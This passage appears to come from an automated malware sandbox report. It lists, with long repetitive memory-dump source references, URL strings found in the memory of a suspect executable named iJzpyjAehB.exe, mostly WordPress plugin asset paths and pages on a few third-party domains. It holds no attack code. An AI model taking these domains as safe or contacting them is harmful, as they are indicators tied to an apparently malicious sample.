iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://myropcb.com
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://myropcb.com/login/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://myropcb.com/register/
                      Source: iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275586647.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.421181826.0000000002540000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.419930323.0000000008700000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274065414.0000000003600000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275803176.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274386745.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.277227725.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.423509233.0000000000A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://new.nelipak.com/
                      Source: svchost.exe, 00000016.00000003.496913823.000000000332A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://opengraphprotocol.org/schema/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pcgrate.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.10.3
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.10.3
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/js/preloaded-elements-handlers.min.js?ve
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.10.3
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus.min.js?
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver=3.10
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/css/frontend-legacy.min.css?ver=3.11.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.11.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.11.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.11.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.11.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.11.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.11.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.9.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=3.11.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ver
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.15.
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/v4-shims.min.css?ver=3.
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.min.js?ver=3.11
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.11.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/swiper/css/swiper.min.css?ver=5.3.6
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/css/main.css?ver=2.1.40
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/js/ooohboi-steroids.js?
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/pojo-accessibility/assets/css/style.min.css?ver=1.0.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/pojo-accessibility/assets/js/app.min.js?ver=1.0.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/css/flipbook.style.css?ver=3.25
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/css/font-awesome.css?ver=3.25
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/embed.js?ver=3.25
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.book3.min.js?ver=3.25
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.min.js?ver=3.25
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.pdfservice.min.js?ver=3.25
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.swipe.min.js?ver=3.25
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.webgl.min.js?ver=3.25
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/iscroll.min.js?ver=3.25
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/pdf.min.js?ver=3.25
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/three.min.js?ver=3.25
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/tfc-product-catalog/tfc-product-catalog.js?ver=1.0.0
